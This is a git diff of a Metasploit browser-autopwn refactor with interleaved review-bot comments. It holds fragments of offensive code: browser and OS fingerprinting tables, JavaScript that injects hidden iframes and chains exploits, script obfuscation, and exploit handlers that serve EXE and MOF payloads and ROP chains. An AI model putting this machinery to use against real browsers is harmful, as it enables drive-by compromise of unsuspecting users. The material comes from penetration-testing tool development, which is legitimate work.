Merge branch 'bap-refactor' of https://github.com/jlee-r7/metasploit-framework into jlee-r7-bap-refactor
This commit is contained in:
commit
bef12478fc
|
@ -62,11 +62,19 @@ window.os_detect.getVersion = function(){
|
|||
// though I have not verfied this claim.
|
||||
switch (opera.buildNumber('inconspicuous')) {
|
||||
case "344": // opera-9.0-20060616.1-static-qt.i386-en-344
|
||||
case "1347": // Opera 9.80 / Ubuntu 10.10 (Karmic Koala)
|
||||
case "2091": // opera-9.52-2091.gcc3-shared-qt3.i386.rpm
|
||||
case "2444": // opera-9.60.gcc4-shared-qt3.i386.rpm
|
||||
case "2474": // Opera 9.63 / Debian Testing (Lenny)
|
||||
case "4102": // Opera 10.00 / Ubuntu 8.04 LTS (Hardy Heron)
|
||||
case "6386": // 10.61
|
||||
os_name = oses_linux;
|
||||
break;
|
||||
case "1074": // Opera 11.50 / Windows XP
|
||||
case "1100": // Opera 11.52 / Windows XP
|
||||
case "3445": // 10.61
|
||||
case "3516": // Opera 10.63 / Windows XP
|
||||
case "7730": // Opera 8.54 / Windows XP
|
||||
case "8502": // "Opera 9 Eng Setup.exe"
|
||||
case "8679": // "Opera_9.10_Eng_Setup.exe"
|
||||
case "8771": // "Opera_9.20_Eng_Setup.exe"
|
||||
|
@ -74,12 +82,21 @@ window.os_detect.getVersion = function(){
|
|||
case "8801": // "Opera_9.22_Eng_Setup.exe"
|
||||
case "10108": // "Opera_952_10108_en.exe"
|
||||
case "10467": // "Opera_962_en_Setup.exe"
|
||||
case "3445": // 10.61
|
||||
case "10476": // Opera 9.63 / Windows XP
|
||||
os_name = oses_windows;
|
||||
break;
|
||||
case "2480": // Opera 9.64 / FreeBSD 7.0
|
||||
os_name = oses_freebsd;
|
||||
break;
|
||||
case "6386": // 10.61
|
||||
os_name = oses_mac_osx;
|
||||
break;
|
||||
// A few are ambiguous, record them here
|
||||
case "1250":
|
||||
// Opera 9.80 / Windows XP
|
||||
// Opera 11.61 / Windows XP
|
||||
// Opera 11.61 / Debian 4.0 (Etch)
|
||||
break;
|
||||
//default:
|
||||
// document.write(opera.buildNumber('inconspicuous'));
|
||||
// break;
|
||||
|
@ -235,11 +252,13 @@ window.os_detect.getVersion = function(){
|
|||
} break;
|
||||
case "2008102918": ua_version = "2.0.0.18"; os_name = oses_windows; break;
|
||||
case "2008102920": ua_version = "3.0.4"; break;
|
||||
case "2008112309": ua_version = "3.0.4"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Iceweasel 3.0.4 / Debian Testing (Lenny)
|
||||
case "2008111317": ua_version = "3.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2008111318": ua_version = "3.0.5"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
|
||||
case "2008120119": ua_version = "2.0.0.19"; os_name = oses_windows; break;
|
||||
case "2008120121": ua_version = "3.0.5"; os_name = oses_linux; break;
|
||||
case "2008120122": ua_version = "3.0.5"; os_name = oses_windows; break;
|
||||
case "2008121623": ua_version = "2.0.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 2.0.0.19 / Ubuntu 8.04 LTS (Hardy Heron)
|
||||
case "2008121709": ua_version = "2.0.0.20"; os_name = oses_windows; break;
|
||||
case "2009011912": ua_version = "3.0.6"; os_name = oses_linux; break;
|
||||
case "2009011913": ua_version = "3.0.6"; os_name = oses_windows; break;
|
||||
|
@ -379,20 +398,20 @@ window.os_detect.getVersion = function(){
|
|||
case "20091216142458": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86_64; break;
|
||||
case "20091216142519": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "Fedora"; arch = arch_x86; break;
|
||||
case "2009121708": ua_version = "3.0.16"; os_name = oses_linux; os_flavor = "CentOS"; arch = arch_x86; break;
|
||||
case "2009122115": ua_version = "3.0.17"; break; // Can be either Mac or Linux
|
||||
case "2009122116": ua_version = "3.0.17"; os_name = oses_windows; break;
|
||||
case "20091221151141": ua_version = "3.5.7"; os_name = oses_mac_osx; break;
|
||||
case "20091221152502": ua_version = "3.5.7"; os_name = oses_linux; break;
|
||||
case "2009122115": ua_version = "3.0.17"; break; // Can be either Mac or Linux
|
||||
case "20091221164558": ua_version = "3.5.7"; os_name = oses_windows; break;
|
||||
case "2009122116": ua_version = "3.0.17"; os_name = oses_windows; break;
|
||||
case "2009122200": ua_version = "3.5.7"; os_name = oses_linux; os_flavor = "SUSE"; break;
|
||||
case "20091223231431": ua_version = "3.5.6"; os_name = oses_linux; os_flavor = "PCLunixOS"; arch = arch_x86; break;
|
||||
case "20100105194006": ua_version = "3.6.0.rc1"; os_name = oses_mac_osx; break;
|
||||
case "20100105194116": ua_version = "3.6.0.rc1"; os_name = oses_linux; break;
|
||||
case "20100105212446": ua_version = "3.6.0.rc1"; os_name = oses_windows; break;
|
||||
case "2010010604": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
|
||||
case "2010010605": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100106054534": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break; // Could also be Mint x86
|
||||
case "20100106054634": ua_version = "3.5.8"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break; // Could also be Mint x86-64
|
||||
case "2010010605": ua_version = "3.0.18"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100106211825": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
|
||||
case "20100106212742": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86_64; break;
|
||||
case "20100106215614": ua_version = "3.5.7"; os_name = oses_freebsd; os_flavor = "PC-BSD"; arch = arch_x86; break;
|
||||
|
@ -451,8 +470,8 @@ window.os_detect.getVersion = function(){
|
|||
case "2010040116": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2010040118": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2010040119": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2010040121": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100401213457": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86; break;
|
||||
case "2010040121": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "2010040123": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "2010040200": ua_version = "3.0.19"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20100402010516": ua_version = "3.5.9"; os_name = oses_linux; os_flavor = "Mint"; arch = arch_x86_64; break;
|
||||
|
@ -533,6 +552,24 @@ window.os_detect.getVersion = function(){
|
|||
case "20100716093011": ua_version = "3.6.7.b2"; os_name = oses_linux; os_flavor = "Ubuntu"; arch = arch_x86_64; break;
|
||||
case "20101203075014": ua_version = "3.6.13"; os_name = oses_windows; break;
|
||||
case "20101206122825": ua_version = "3.6.13"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
|
||||
case "20110318052756": ua_version = "4.0"; os_name = oses_windows; break; // browsershots: Firefox 4.0 / Windows XP
|
||||
case "20110420144310": ua_version = "3.5.19"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 3.5.19 / Debian 4.0 (Etch)
|
||||
case "20110615151330": ua_version = "5.0"; os_name = oses_windows; break; // browsershots: Firefox 5.0 / Windows XP
|
||||
case "20110811165603": ua_version = "6.0"; os_name = oses_windows; break; // browsershots: Firefox 6.0 / Windows XP
|
||||
case "20110830092941": ua_version = "6.0.1"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 6.0.1 / Debian 4.0 (Etch)
|
||||
case "20110922153450": ua_version = "7.0"; os_name = oses_windows; break; // browsershots: Firefox 7.0 / Windows XP
|
||||
case "20110928134238": ua_version = "7.0.1"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 7.0.1 / Debian 4.0 (Etch)
|
||||
case "20111104165243": ua_version = "8.0"; os_name = oses_windows; break; // browsershots: Firefox 8.0 / Windows XP
|
||||
case "20111115183813": ua_version = "8.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 8.0 / Ubuntu 9.10 (Karmic Koala)
|
||||
case "20111216140209": ua_version = "9.0"; os_name = oses_windows; break; // browsershots: Firefox 9.0 / Windows XP
|
||||
case "20120129021758": ua_version = "10.0"; os_name = oses_windows; break; // browsershots: Firefox 10.0 / Windows 2000
|
||||
case "20120201083324": ua_version = "3.5.16"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Iceweasel 3.5.16 / Debian 4.0 (Etch)
|
||||
case "20120216013254": ua_version = "3.6.27"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 3.6.27 / Debian 4.0 (Etch)
|
||||
case "20120216100510": ua_version = "10.0.2"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 10.0.2 / Ubuntu 9.10 (Karmic Koala)
|
||||
case "20120310010316": ua_version = "11.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break; // browsershots: Firefox 11.0 / Ubuntu 9.10 (Karmic Koala)
|
||||
case "20120310194926": ua_version = "11.0"; os_name = oses_linux; os_flavor = "Ubuntu"; break;
|
||||
case "20120312181643": ua_version = "11.0"; os_name = oses_windows; break; // browsershots: Firefox 11.0 / Windows XP
|
||||
case "20120314195616": ua_version = "12.0"; os_name = oses_linux; os_flavor = "Debian"; break; // browsershots: Firefox 12.0 / Debian 4.0 (Etch)
|
||||
default:
|
||||
version = this.searchVersion("Firefox", navigator.userAgent);
|
||||
// Verify whether the ua string is lying by checking if it contains
|
||||
|
@ -644,6 +681,12 @@ window.os_detect.getVersion = function(){
|
|||
os_flavor = "XP";
|
||||
os_sp = "SP3";
|
||||
break;
|
||||
case "5722589":
|
||||
// browsershots.org, MSIE 7.0 / Windows XP
|
||||
ua_version = "7.0";
|
||||
os_flavor = "XP";
|
||||
// don't know what the service pack is =(
|
||||
break;
|
||||
case "576000":
|
||||
// IE 7.0.6000.16386, Vista Ultimate SP0 English
|
||||
ua_version = "7.0";
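Review bot: `case "6386": // 10.61` appears under `os_name = oses_linux;` in the first hunk and again under `os_name = oses_mac_osx;` in the second, and `case "3445": // 10.61` appears twice in the Windows group; JavaScript accepts duplicate case labels silently and the first match wins, so wherever both copies survive on the new side the later branch is unreachable (the rendered page lost the +/- markers, so I cannot tell which copy this commit removed). If the Mac mapping for 6386 is meant to stay it belongs in the "A few are ambiguous" block alongside `case "1250":`, with no `os_name` assignment; otherwise the dead branch should go. The two `// 10.61` comments should also name the platform and source like their neighbours, e.g. `// Opera 10.61 / <platform> (browsershots)`, so the next person can tell which entry is authoritative.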
|
||||
|
|
|
@ -706,7 +706,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# Generic stuff that is needed regardless of what browser was detected.
|
||||
js << <<-ENDJS
|
||||
var written_iframes = new Array();
|
||||
function write_iframe(myframe) {
|
||||
window.write_iframe = function (myframe) {
|
||||
var iframe_idx; var mybody;
|
||||
for (iframe_idx in written_iframes) {
|
||||
if (written_iframes[iframe_idx] == myframe) {
|
||||
|
@ -718,7 +718,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
str += '<iframe src="' + myframe + '" style="visibility:hidden" height="0" width="0" border="0"></iframe>';
|
||||
document.body.innerHTML += (str);
|
||||
}
|
||||
function next_exploit(exploit_idx) {
|
||||
window.next_exploit = function (exploit_idx) {
|
||||
#{js_debug("'next_exploit(' + exploit_idx +')'")}
|
||||
if (!global_exploit_list[exploit_idx]) {
|
||||
#{js_debug("'End'")}
|
||||
|
@ -745,15 +745,15 @@ class Metasploit3 < Msf::Auxiliary
|
|||
|
||||
if (eval(test)) {
|
||||
#{js_debug("'test says it is vuln, writing iframe for ' + global_exploit_list[exploit_idx].resource + '<br>'")}
|
||||
write_iframe(global_exploit_list[exploit_idx].resource);
|
||||
setTimeout("next_exploit(" + (exploit_idx+1).toString() + ")", 1000);
|
||||
window.write_iframe(global_exploit_list[exploit_idx].resource);
|
||||
setTimeout("window.next_exploit(" + (exploit_idx+1).toString() + ")", 1000);
|
||||
} else {
|
||||
#{js_debug("'this client does not appear to be vulnerable to ' + global_exploit_list[exploit_idx].resource + '<br>'")}
|
||||
next_exploit(exploit_idx+1);
|
||||
window.next_exploit(exploit_idx+1);
|
||||
}
|
||||
} catch(e) {
|
||||
#{js_debug("'test threw an exception: ' + e.message + '<br />'")}
|
||||
next_exploit(exploit_idx+1);
|
||||
window.next_exploit(exploit_idx+1);
|
||||
};
|
||||
}
|
||||
ENDJS
|
||||
|
@ -766,7 +766,12 @@ class Metasploit3 < Msf::Auxiliary
|
|||
@js_tests.each { |browser, sploits|
|
||||
next unless client_matches_browser(client_info, browser)
|
||||
|
||||
if (client_info.nil? || [nil, browser].include?(client_info[:ua_name]))
|
||||
# Send all the generics regardless of what the client is. If the
|
||||
# client is nil, then we don't know what it really is, so just err
|
||||
# on the side of shells and send everything. Otherwise, send only
|
||||
# if the client is using the browser associated with this set of
|
||||
# exploits.
|
||||
if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name]))
|
||||
sploits.each do |s|
|
||||
if s[:vuln_test].nil? or s[:vuln_test].empty?
|
||||
test = "is_vuln = true"
|
||||
|
@ -783,7 +788,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# victim. Note that host_info comes from javascript OS
|
||||
# detection, NOT the database.
|
||||
if host_info[:os_name] != "undefined"
|
||||
next unless s[:os_name].include?(host_info[:os_name])
|
||||
unless s[:os_name].include?(host_info[:os_name])
|
||||
vprint_status("Rejecting #{s[:name]} for non-matching OS")
|
||||
next
|
||||
end
|
||||
end
|
||||
end
|
||||
js << "global_exploit_list[global_exploit_list.length] = {\n"
|
||||
|
@ -832,8 +840,8 @@ class Metasploit3 < Msf::Auxiliary
|
|||
js << %Q|noscript_div.innerHTML = unescape(noscript_exploits);\n|
|
||||
js << %Q|document.body.appendChild(noscript_div);\n|
|
||||
|
||||
js << "#{js_debug("'starting exploits<br>'")}\n"
|
||||
js << "next_exploit(0);\n"
|
||||
js << "#{js_debug("'starting exploits (' + global_exploit_list.length + ' total)<br>'")}\n"
|
||||
js << "window.next_exploit(0);\n"
|
||||
|
||||
js = ::Rex::Exploitation::JSObfu.new(js)
|
||||
js.obfuscate
|
||||
|
@ -881,6 +889,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
def client_matches_browser(client_info, browser)
|
||||
if client_info and browser and client_info[:ua_name]
|
||||
if browser != "generic" and client_info[:ua_name] != browser
|
||||
vprint_status("Rejecting exploits for #{browser}")
|
||||
return false
|
||||
end
|
||||
end
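Review bot: The new `next unless client_matches_browser(client_info, browser)` already skips every non-generic browser mismatch, so the rebuilt condition `if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name]))` a few lines below can no longer be false: its three clauses are exactly the cases `client_matches_browser` lets through (I am inferring its final `true` return, which lies outside the last hunk). One of the two checks should go, preferably the inline one, with the explanatory comment moved next to the `next unless`. Separately, `setTimeout("window.next_exploit(" + (exploit_idx+1).toString() + ")", 1000);` builds a string for eval where `setTimeout(function(){ window.next_exploit(exploit_idx+1); }, 1000);` would do and survives obfuscation more predictably. `client_matches_browser` continues past the end of the hunk.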
|
||||
|
|
|
@ -144,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Both ROP chains generated by mona.py - See corelan.be
|
||||
case t['Rop']
|
||||
when :msvcrt
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Using msvcrt ROP")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Using msvcrt ROP")
|
||||
exec_size = code.length
|
||||
rop =
|
||||
[
|
||||
|
@ -169,7 +169,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
].pack("V*")
|
||||
|
||||
when :jre
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Using JRE ROP")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Using JRE ROP")
|
||||
exec_size = 0xffffffff - code.length + 1
|
||||
rop =
|
||||
[
|
||||
|
@ -243,23 +243,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# Avoid the attack if the victim doesn't have the same setup we're targeting
|
||||
if my_target.nil?
|
||||
print_error("#{cli.peerhost}:#{cli.peerport} - Browser not supported: #{agent.to_s}")
|
||||
print_error("#{cli.peerhost.ljust(16)} #{self.shortname} Browser not supported: #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Client requesting: #{request.uri}")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Client requesting: #{request.uri}")
|
||||
|
||||
# The SWF requests our MP4 trigger
|
||||
if request.uri =~ /\.mp4$/
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Sending MP4...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending MP4...")
|
||||
mp4 = create_mp4(my_target)
|
||||
send_response(cli, mp4, {'Content-Type'=>'video/mp4'})
|
||||
return
|
||||
end
|
||||
|
||||
if request.uri =~ /\.swf$/
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Sending Exploit SWF...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending Exploit SWF")
|
||||
send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash' })
|
||||
return
|
||||
end
|
||||
|
@ -323,7 +323,7 @@ pluginspage="http://www.macromedia.com/go/getflashplayer">
|
|||
|
||||
html = html.gsub(/^\t\t/, '')
|
||||
|
||||
print_status("#{cli.peerhost}:#{cli.peerport} - Sending html")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending html")
|
||||
send_response(cli, html, {'Content-Type'=>'text/html'})
|
||||
end
|
||||
|
||||
|
|
|
@ -20,9 +20,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:ua_name => HttpClients::IE,
|
||||
:javascript => true,
|
||||
:rank => NormalRanking, # reliable memory corruption
|
||||
:vuln_test => nil,
|
||||
})
|
||||
|
||||
def initialize(info = {})
|
||||
|
@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
return if ((p = regenerate_payload(client)) == nil)
|
||||
|
||||
print_status("Sending #{self.name} exploit HTML to #{client.peerhost}:#{client.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML...")
|
||||
|
||||
shellcode = Rex::Text.to_unescape(p.encoded)
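Review bot: The rewritten log line `print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML...")` references `cli`, but the context line `return if ((p = regenerate_payload(client)) == nil)` two lines above shows this handler's connection object is named `client`, and the line it replaces used `client.peerhost`. Unless `cli` is defined elsewhere in the method (its signature is outside the hunk), this raises NameError on the first request and the exploit never sends. The fix is `print_status("#{client.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML...")`, or renaming the parameter to `cli` throughout the method for consistency with the other modules in this commit.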
|
||||
|
||||
|
|
|
@ -19,6 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
# No particular browser. Works on at least IE6 and Firefox 1.5.0.3
|
||||
:javascript => true,
|
||||
:rank => NormalRanking, # reliable memory corruption
|
||||
:vuln_test => nil,
|
||||
|
@ -94,11 +95,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
sploit << [target.ret].pack('V') + [0xe8, -485].pack('CV')
|
||||
|
||||
if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.qtl$/)
|
||||
print_status("Sending #{self.name} exploit to #{client.peerhost}:#{client.peerport}...")
|
||||
print_status("Trying target #{target.name}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit QTL file (target: #{target.name})")
|
||||
content = build_qtl(sploit)
|
||||
else
|
||||
print_status("Sending #{self.name} init HTML to #{client.peerhost}:#{client.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending init HTML")
|
||||
|
||||
shellcode = Rex::Text.to_unescape(p.encoded)
|
||||
url = ((datastore['SSL']) ? "https://" : "http://")
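Review bot: Both new status lines use `cli.peerhost`, while the lines they replace used `client.peerhost` and nothing in the hunk introduces a `cli`; the handler's signature is outside the hunk, so if its parameter is still `client` (as the old code implies) both branches raise NameError before `build_qtl(sploit)` or the init HTML is sent. Either `client.peerhost.ljust(16)` in both lines, or rename the parameter to `cli` and update the other `client` uses in the method. The `if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.qtl$/)` guard also mixes `or` with `=~`; `||` avoids the precedence surprise when this condition is extended later.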
|
||||
|
|
|
@ -78,8 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return if ((p = regenerate_payload(client)) == nil)
|
||||
|
||||
if (request['User-Agent'] =~ /QuickTime/i or request.uri =~ /\.smil$/)
|
||||
print_status("Sending #{self.name} exploit to #{client.peerhost}:#{client.peerport}...")
|
||||
print_status("Trying target #{target.name}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit SMIL (target: #{target.name})")
|
||||
|
||||
# This is all basically filler on the browser target because we can't
|
||||
# expect the SEH to be in a reliable place across multiple browsers.
|
||||
|
@ -119,7 +118,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
send_response(client, smil, { 'Content-Type' => "application/smil" })
|
||||
|
||||
else
|
||||
print_status("Sending #{self.name} init HTML to #{client.peerhost}:#{client.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending init HTML")
|
||||
|
||||
shellcode = Rex::Text.to_unescape(p.encoded)
|
||||
url = ((datastore['SSL']) ? "https://" : "http://")
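Review bot: The two new status lines use `cli.peerhost`, but the surrounding context on the new side still calls `regenerate_payload(client)` and `send_response(client, smil, ...)`, so the connection object in this handler is named `client`; `cli` is undefined here unless it is provided elsewhere in the method (the signature is outside the hunk), and the NameError would fire before either the SMIL or the init HTML is sent. Use `client.peerhost.ljust(16)` in both lines, or rename the parameter to `cli` and update every `client` reference in the method together.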
|
||||
|
|
|
@ -21,9 +21,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:ua_name => HttpClients::IE,
|
||||
:javascript => true,
|
||||
:rank => NormalRanking,
|
||||
:vuln_test => nil,
|
||||
:classid => "{79956462-F148-497F-B247-DF35A095F80B}",
|
||||
:vuln_test => "DownloadImageFileURL",
|
||||
})
|
||||
|
||||
def initialize(info = {})
|
||||
|
@ -83,14 +85,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def on_request_uri(cli, request)
|
||||
|
||||
if request.uri.match(/\.EXE/)
|
||||
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending EXE payload...")
|
||||
send_response(cli, @payload, { 'Content-Type' => 'application/octet-stream' })
|
||||
return
|
||||
elsif request.uri.match(/\.MOF/)
|
||||
return if @mof_name == nil or @payload_name == nil
|
||||
print_status("Generating mof...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Generating mof")
|
||||
mof = generate_mof(@mof_name, @payload_name)
|
||||
print_status("Sending MOF to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending MOF...")
|
||||
send_response(cli, mof, {'Content-Type'=>'application/octet-stream'})
|
||||
return
|
||||
end
|
||||
|
@ -135,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
#Clear the extra tabs
|
||||
content = content.gsub(/^\t\t/, '')
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML")
|
||||
send_response_html(cli, content)
|
||||
handler(cli)
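Review bot: `:vuln_test => "DownloadImageFileURL"` placed next to the new `:classid` reads as the name of a method to probe on the instantiated control, not a JavaScript snippet as `vuln_test` is in the other modules this commit touches (a regex test on `navigator.userAgent`); which interpretation applies is decided by browser_autopwn, outside this file. A short comment would save the next reader the lookup: `# with :classid set, vuln_test names a method autopwn checks on the control rather than inline JS -- confirm against browser_autopwn`. In the `.MOF` branch, `return if @mof_name == nil or @payload_name == nil` drops the request without any response, whereas the other early exits in this commit answer the client; `send_not_found(cli)` before that `return` would be consistent.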
|
||||
|
||||
|
|
|
@ -17,14 +17,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
|
||||
include Msf::Exploit::Remote::BrowserAutopwn
|
||||
autopwn_info({
|
||||
:os_name => OperatingSystems::WINDOWS,
|
||||
:javascript => true,
|
||||
:rank => NormalRanking,
|
||||
:vuln_test => nil,
|
||||
})
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'EnjoySAP SAP GUI ActiveX Control Arbitrary File Download',
|
||||
|
|
|
@ -126,7 +126,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if (request.uri.match(/payload/))
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
data = generate_payload_exe({ :code => p.encoded })
|
||||
print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending EXE payload")
|
||||
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
|
||||
return
|
||||
end
|
||||
|
@ -260,7 +260,8 @@ function #{var_func_exploit}( ) {
|
|||
|
||||
content = Rex::Text.randomize_space(content)
|
||||
|
||||
print_status("Sending #{self.name} exploit HTML to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML...")
|
||||
|
||||
|
||||
# Transmit the response to the client
|
||||
send_response_html(cli, content)
|
||||
|
|
|
@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Re-generate the payload
|
||||
return if ((p = regenerate_payload(cli)) == nil)
|
||||
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending exploit HTML...")
|
||||
send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
|
||||
|
||||
# Handle the payload
|
||||
|
|
|
@ -128,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
# check for non vulnerable targets
|
||||
if agent !~ /NT 5\.1/ or agent !~ /NT 6\.1/ and agent !~ /Firefox\/3\.6\.16/
|
||||
vprint_error("Target not supported: #{agent}")
|
||||
vprint_error("#{cli.peerhost.ljust(16)} #{self.shortname} Target not supported: #{agent}")
|
||||
send_not_found(cli)
|
||||
return
|
||||
end
|
||||
|
@ -346,7 +346,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
#Remove the extra tabs
|
||||
html = html.gsub(/^\t\t/, '')
|
||||
print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Sending HTML...")
|
||||
send_response_html(cli, html, { 'Content-Type' => 'text/html' })
|
||||
|
||||
# Handle the payload
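Review bot: The guard `if agent !~ /NT 5\.1/ or agent !~ /NT 6\.1/ and agent !~ /Firefox\/3\.6\.16/` does not express the target filter it seems to intend: Ruby's `or` and `and` share one precedence level and associate left, so this parses as `(not XP or not Win7) and not Firefox 3.6.16`, and the parenthesised part is true for every agent because no User-Agent is both NT 5.1 and NT 6.1, leaving only the Firefox check effective and the OS check a no-op. Presumably `if (agent !~ /NT 5\.1/ && agent !~ /NT 6\.1/) || agent !~ /Firefox\/3\.6\.16/` was meant. The condition is context rather than changed here, but the `vprint_error` line it guards is, so this is the moment to fix it.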
|
||||
|
|
|
@ -222,7 +222,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def on_request_uri(cli, request)
|
||||
|
||||
if request.uri == get_resource() or request.uri =~ /\/$/
|
||||
print_status("#{self.refname}: Redirecting #{cli.peerhost}:#{cli.peerport}")
|
||||
print_status("#{cli.peerhost.ljust(16)} #{self.shortname} Redirecting to .html URL")
|
||||
redir = get_resource()
|
||||
redir << '/' if redir[-1,1] != '/'
|
||||
redir << rand_text_alphanumeric(4+rand(4))
|
||||
|
@ -230,7 +230,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
send_redirect(cli, redir)
|
||||
|
||||
elsif request.uri =~ /\.html?$/
|
||||
print_status("#{self.refname}: Sending HTML to #{cli.peerhost}:#{cli.peerport}")
|
||||
